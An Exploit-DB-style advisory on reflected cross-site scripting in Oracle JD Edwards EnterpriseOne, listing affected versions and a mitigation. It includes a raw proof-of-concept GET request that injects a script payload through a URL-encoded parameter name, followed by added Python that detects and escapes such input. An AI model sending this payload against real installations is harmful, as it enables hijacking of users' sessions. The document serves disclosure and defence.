Vendor: JD Edwards EnterpriseOne
By:
CVSS: 5.5 (MEDIUM)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: JD Edwards EnterpriseOne
Affected Version From: 8.9 GA
Affected Version To: 8.98.4.1 and OneWorld Tools through 24.1.3
Patch Exists: NO
Related CWE:
CPE: oracle:jde_edwards_enterpriseone
Metasploit:
Other Scripts:
Platforms Tested:

Oracle JD Edwards EnterpriseOne Multiple Cross-Site Scripting Vulnerabilities

An attacker can execute arbitrary script code in the browser of a user in the context of the affected site, potentially stealing authentication credentials and launching other attacks.

Mitigation:

Apply vendor patches or updates that address these XSS vulnerabilities. Filter user-supplied input, removing or encoding potentially malicious characters before it is reflected in a page.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47479/info

Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This vulnerability affects the following supported versions:
8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 

http://XXX.XXX.XXX.XXX/jde/E1Menu.maf

Parameter: jdeowpBackButtonProtect

* The GET request has been set to: >'"><script>alert(20639)</script>

/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123 HTTP/1.0
Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00002ZzkuqI4ibppzAAcyOOuBnh:14p7umbnp; e1MenuState=100003759|
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: XXX.XXX.XXX.XXX
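In the proof-of-concept request above the script payload is URL-encoded into a parameter *name* (the field whose value is `123`), not into a parameter value. The following Python is an added example, not part of the advisory or the Exploit-DB entry: it decodes that query string, flags HTML metacharacters wherever they appear (name or value), runs the same check over constructed access-log lines, and shows output encoding applied to names as well as values, which is the mitigation the advisory asks for. The log lines and client addresses are constructed.

```python
import re
import html
from urllib.parse import urlsplit, parse_qsl

# Request path from the advisory's proof of concept (HTTP version dropped).
POC_PATH = ("/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED"
            "&%3E%27%22%3E%3Cscript%3Ealert%2820639%29%3C%2Fscript%3E=123")
# Characters that must never reach an HTML response unencoded.
HTML_SPECIALS = set('<>"\'&')

def query_params(path):
    """Decode the query string into (name, value) pairs, keeping empty values."""
    return parse_qsl(urlsplit(path).query, keep_blank_values=True)

def tainted_fields(path):
    """Return ('name' or 'value', parameter name) for each field carrying HTML specials.
    In this PoC the payload is a parameter *name*; a value-only filter reports nothing."""
    found = []
    for name, value in query_params(path):
        if HTML_SPECIALS & set(name):
            found.append(("name", name))
        if HTML_SPECIALS & set(value):
            found.append(("value", name))
    return found

def render_hidden_fields(path):
    """Reflect the query as hidden inputs safely: HTML-encode names AND values."""
    return "\n".join(
        '<input type="hidden" name="%s" value="%s">'
        % (html.escape(n, quote=True), html.escape(v, quote=True))
        for n, v in query_params(path))

# Constructed access-log lines (not from the advisory) for the detection pass.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Apr/2011:10:01:02 +0000] "GET /jde/E1Menu.maf?selectJPD812=*ALL HTTP/1.0" 200 512',
    '10.0.0.9 - - [21/Apr/2011:10:01:07 +0000] "GET ' + POC_PATH + ' HTTP/1.0" 200 640',
]
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def flag_log_lines(lines):
    """Return (client_ip, findings) for log lines whose request path is tainted."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        findings = tainted_fields(m.group(2)) if m else []
        if findings:
            hits.append((m.group(1), findings))
    return hits
```

Note that `tainted_fields` inspects decoded data, so percent-encoding in the raw request does not hide the payload from the check.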